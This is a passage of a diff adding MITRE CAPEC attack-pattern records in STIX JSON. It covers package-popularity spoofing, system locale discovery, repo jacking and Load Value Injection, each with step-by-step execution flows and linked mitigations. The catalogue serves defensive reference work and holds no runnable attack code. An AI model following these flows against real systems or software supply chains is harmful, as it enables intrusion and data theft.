GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

  2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source packages, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--497b80f8-f95d-460c-9dcf-aa331b2ed9bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7d52984d-c34c-4aec-825b-5aafc55818aa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--497b80f8-f95d-460c-9dcf-aa331b2ed9bd", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--1e8b4827-7c48-453b-b08d-b88b9f81917c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--898f5368-60ae-4688-851e-a78e94c98572", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e8b4827-7c48-453b-b08d-b88b9f81917c", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7ed969a-dced-41b9-98f6-c2836ad4a870", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--501c303f-fb43-4395-9b2b-5d43311228dd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source packages, ensure integrity values have not changed.", + "id": "course-of-action--c5d6d68d-5f52-4780-bf41-c003cb6e4a8a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ca50af9a-124b-455d-8cfb-b65d4802ab64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c5d6d68d-5f52-4780-bf41-c003cb6e4a8a", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the package, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--c8124caa-0363-4ab9-b7e2-241f17311f63", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ccd42f0-bdc3-4ab4-a1cf-e0544db6a281", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--c8124caa-0363-4ab9-b7e2-241f17311f63", + "target_ref": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary collects information about the target system in an attempt to identify the system's geographical location.\n Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.\n ", + "external_references": [ + { + "external_id": "CAPEC-694", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/694.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "System Language Discovery", + "external_id": "T1614", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1614" + }, + { + "description": "Language-Specific Registry Entries", + "external_id": "REF-727", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/language-specific-registry-entries" + }, + { + "description": "winnls.h header", + "external_id": "REF-728", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/winnls/" + }, + { + "description": "local (1p) - Linux Man Pages", + "external_id": "REF-729", + "source_name": "reference_from_CAPEC", + "url": "https://www.systutorials.com/docs/linux/man/1p-locale/" + }, + { + "description": "vconsole.conf", + "external_id": "REF-730", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/vconsole.conf.html" + }, + { + "description": "timedatectl", + 
"external_id": "REF-731", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/timedatectl.html" + } + ], + "id": "attack-pattern--83f12d51-7469-4f09-99cc-fa4a3ea8197d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "System Location Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. System Locale Information Discovery: The adversary examines system information from various sources such as registry and native API functions and correlates the gathered information to infer the geographical location of the target system

  2. Techniques
    Registry Query: Query the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\Language_Dialect on Windows to obtain system language, Computer\\HKEY_CURRENT_USER\\Keyboard Layout\\Preload to obtain the hexadecimal language IDs of the current user's preloaded keyboard layouts, and Computer\\HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation to obtain the system timezone configuration
    Native API Requests: Parse the outputs of Windows API functions GetTimeZoneInformation, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID to obtain information about languages, keyboard layouts, and timezones installed on the system or on macOS or Linux systems, query locale to obtain the $LANG environment variable and view keyboard layout information or use timeanddatectl status to show the system clock settings.
    Read Configuration Files: For macOS and Linux-based systems, view the /etc/vconsole.conf file to get information about the keyboard mapping and console font.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have some level of access to the system and have a basic understanding of the operating system in order to query the appropriate sources for relevant information." + ], + "x_capec_resources_required": [ + "The adversary requires access to the target's operating system tools to query relevant system information. On windows, registry queries can be conducted with powershell, wmi, or regedit. On Linux or macOS, queries can be performed with through a shell." + ], + "x_capec_skills_required": { + "Low": "The adversary must know how to query various system sources of information respective of the system's operating system to obtain the relevant information." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To reduce the amount of information gathered, one could disable various geolocation features of the operating system not required for system operation.", + "id": "course-of-action--18f5bca4-2458-41da-8242-fa30bb7d55a6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-694-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1233daf6-156e-4dbc-9167-b0d259a5595d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--18f5bca4-2458-41da-8242-fa30bb7d55a6", + "target_ref": "attack-pattern--83f12d51-7469-4f09-99cc-fa4a3ea8197d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + 
"created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.\n ", + "external_references": [ + { + "external_id": "CAPEC-695", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Indiana Moreau, Repo Jacking: Exploiting the Dependency Supply Chain, 2020--10---22, Security Innovation", + "external_id": "REF-722", + "source_name": "reference_from_CAPEC", + "url": "https://www.concretecms.org/about/project-news/security/supply-chain-hack-phpass-repo-jacking" + }, + { + "description": "Theo Burton, CyRC Vulnerability Analysis: Repo jacking in the software supply chain, 2022--08---02, Synopsys", + "external_id": "REF-732", + "source_name": "reference_from_CAPEC", + "url": "https://www.synopsys.com/blogs/software-security/cyrc-vulnerability-analysis-repo-jacking/" + }, + { + "description": "Jossef Harush, Attacker Caught Hijacking Packages Using Multiple Techniques to Steal AWS Credentials, 2022--05---25, Checkmarx", + "external_id": "REF-733", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/attacker-caught-hijacking-packages-using-multiple-techniques-to-steal-aws-credentials/" + }, + { + "description": "Jossef Harush, GitHub RepoJacking Weakness Exploited in the Wild by 
Attackers, 2022--05---27, Checkmarx", + "external_id": "REF-734", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/" + } + ], + "id": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Repo Jacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In May 2022, the CTX Python package and PhPass PHP package were both exploited by the same adversary via Repo Jacking attacks. For the CTX package, the adversary performed an account takeover via a password reset, due to an expired domain-hosting email. The attack on PhPass entailed bypassing GitHub's authentication for retired repositories. In both cases, sensitive data in the form of API keys and passwords, each stored in the form of environment variables, were exfiltrated. [REF-732] [REF-733]\n ", + "\n In October 2021, the popular JavaScript library UAParser.js was exploited via the takeover of the author's Node Package Manager (NPM) account. The adversary-provided malware downloaded and executed binaries from a remote server to conduct crypto-mining and to exfiltrate sensitive data on Windows systems. This was a wide-scale attack as the package receives 8 to 9 million downloads per week. 
[REF-732]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository that is commonly used and whose owner/maintainer has either changed/deleted their username or transferred ownership of the repository and then deleted their account. The target should typically be a popular and widely used package, as to increase the scope of the attack.

Experiment

  1. Recreate initial repository path: The adversary re-registers the account that was renamed/deleted by the target repository's owner/maintainer and recreates the target repository with malicious code intended to exploit an application. These steps may need to happen in reverse (i.e., recreate repository and then rename an existing account to the target account) if protections are in place to prevent repository reuse.

Exploit

  1. Exploit victims: The adversary's malicious code is incorporated into applications that directly reference the initial repository, which further allows the adversary to conduct additional attacks.

", + "x_capec_extended_description": "\n Software developers may directly reference a VCS repository (i.e., via a hardcoded URL) within source code to integrate the repository as a dependency for the underlying application. If the repository owner/maintainer modifies the repository name, changes their VCS username, or transfers ownership of the repository, the VCS implements a redirect to the new repository location so that existing software referencing the repository will not break. However, if the original location of the repository is reestablished, the VCS will revert to resolving the hardcoded path. Adversaries may, therefore, re-register deleted or previously used usernames and recreate repositories with malicious code to infect applications referencing the repository. When an application then fetches the desired dependency, it will now reference the adversary's malicious repository since the hardcoded repository path is once again active. This ultimately allows the adversary to infect numerous applications, while achieving a variety of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular repository that may be directly referenced in numerous software applications", + "A repository owner/maintainer who has recently changed their username or deleted their account" + ], + "x_capec_skills_required": { + "Low": "Ability to create malware that can exploit various software applications." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage dedicated package managers instead of directly linking to VCS repositories.", + "id": "course-of-action--9c30154d-5f71-4019-a0a5-68eb7c6f41c9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5aa0bb89-76f3-4d2b-a3d4-fa7d609fb90c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c30154d-5f71-4019-a0a5-68eb7c6f41c9", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize version pinning and lock files to prevent use of maliciously modified repositories.", + "id": "course-of-action--d63a9ee6-20cc-4f7d-98de-af8c1bba5ae9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--be755a2d-2e70-4eea-ad7a-2cd9960dbc0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--d63a9ee6-20cc-4f7d-98de-af8c1bba5ae9", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement \"vendoring\" (i.e., including third-party dependencies locally) and leverage automated testing techniques (e.g., static analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--38cf9fc1-7e97-44bb-bed9-77d94120caec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--967eaeff-e2b8-48c4-9514-9bb0e381ffb3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38cf9fc1-7e97-44bb-bed9-77d94120caec", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools, such as Checkmarx's \"ChainJacking\" tool, to determine susceptibility to Repo Jacking attacks.", + "id": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-695-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04ce1f7f-b24d-413f-a857-e285a30a2271", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55b3c0e8-5896-4190-9262-19406b3de296", + "target_ref": "attack-pattern--a0315bde-71b9-4e1b-9087-c82c3f4c7f36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution in which a faulting or assisted load instruction transiently forwards adversary-controlled data from microarchitectural buffers. By inducing a page fault or microcode assist during victim execution, an adversary can force legitimate victim execution to operate on the adversary-controlled data which is stored in the microarchitectural buffers. 
The adversary can then use existing code gadgets and side channel analysis to discover victim secrets that have not yet been flushed from microarchitectural state or hijack the system control flow.", + "external_references": [ + { + "external_id": "CAPEC-696", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/696.html" + }, + { + "external_id": "CWE-1342", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1342.html" + }, + { + "description": "Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss, Frank Piessens, LVI - Hijacking Transient Execution with Load Value Injection", + "external_id": "REF-735", + "source_name": "reference_from_CAPEC", + "url": "https://lviattack.eu/" + }, + { + "description": "Load Value Injection, 2020--01---27, Intel", + "external_id": "REF-736", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/load-value-injection.html" + } + ], + "id": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Load Value Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application and relevant OS shared code libraries: Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack. The adversary looks for code gadgets which will allow them to load an adversary-controlled value into trusted memory. They also look for code gadgets which might operate on this controlled value.

  2. Techniques
    Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system.

Experiment

  1. Fill microarchitectural buffer with controlled value: The adversary will utilize the found code gadget from the previous step to load a value into a microarchitectural buffer.

  2. Techniques
    The adversary may choose the controlled value to be memory address of sensitive information that they want the system to access
    The adversary may choose the controlled value to be the memory address of other code gadgets that they wish to execute by hijacking the control flow of the system
  3. Set up instruction to page fault or microcode assist: The adversary must manipulate the system such that a page fault or microcode assist occurs when a valid instruction is run. If the instruction that fails is near where the adversary-controlled value was loaded, the system may forward this value from the microarchitectural buffer incorrectly.

  4. Techniques
    When targeting Intel SGX enclaves, adversaries that have privileges can manipulate PTEs to provoke page-fault exceptions or microcode assists.
    When targeting Intel SGX enclaves, adversaries can indirectly revoke permissions for enclave code through the “mprotect” system call
    An adversary can evict selected virtual memory pages using legacy interfaces or by increasing physical memory utilization
    When attacking a Windows machine, wait until the OS clears the PTE accessed bit. When the page is next accessed, the CPU will always issue a microcode assist for re-setting this bit

Exploit

  1. Operate on adversary-controlled data: Once the attack has been set up and the page fault or microcode assist occurs, the system operates on the adversary-controlled data.

  2. Techniques
    Influence the system to load sensitive information into microarchitectural state which can be read by the adversary using a code gadget.
    Hijack execution by jumping to second stage gadgets found in the address space. By utilizing return-oriented programming, this can chain gadgets together and allow the adversary to execute a sequence of gadgets.
", + "x_capec_extended_description": "This attack is a mix of techniques used in traditional Meltdown and Spectre attacks. It uses microarchitectural data leakage combined with code gadget abuse. Intel has identified that this attack is not applicable in scenarios where the OS and the VMM (Virtual Memory Manager) are both trusted. Because of this, Intel SGX is a prime target for this attack because it assumes that the OS or VMM may be malicious.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.", + "The CPU incorrectly transiently forwards values from microarchitectural buffers after faulting or assisted loads", + "The adversary needs the ability to induce page faults or microcode assists on the target system.", + "Code gadgets exist that allow the adversary to hijack transient execution and encode secrets into the microarchitectural state." + ], + "x_capec_skills_required": { + "High": "The ability to provoke faulting or assisted loads in legitimate execution." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow the forwarding of data resulting from a faulting or assisted instruction. 
Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.", + "id": "course-of-action--3054fecd-c70d-453d-a8f6-ec4f7267f82c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18a401b9-c208-4087-b1f4-82a622a57c52", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3054fecd-c70d-453d-a8f6-ec4f7267f82c", + "target_ref": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Insert explicit “lfence” speculation barriers in software before potentially faulting or assisted loads. 
This halts transient execution until all previous instructions have been executed and ensures that the architecturally correct value is forwarded.", + "id": "course-of-action--9b586561-3569-4a6a-a770-afffe4cedb33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-696-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c0a1cbd-bba1-4e83-beb8-80276fc66192", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9b586561-3569-4a6a-a770-afffe4cedb33", + "target_ref": "attack-pattern--f4d86f88-864b-4d41-9077-1f15f1db08c3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary masquerades as a legitimate Dynamic Host Configuration Protocol (DHCP) server by spoofing DHCP traffic, with the goal of redirecting network traffic or denying service to DHCP.\n ", + "external_references": [ + { + "external_id": "CAPEC-697", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-923", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html" + }, + { + "description": "Adversary-in-the-Middle: DHCP 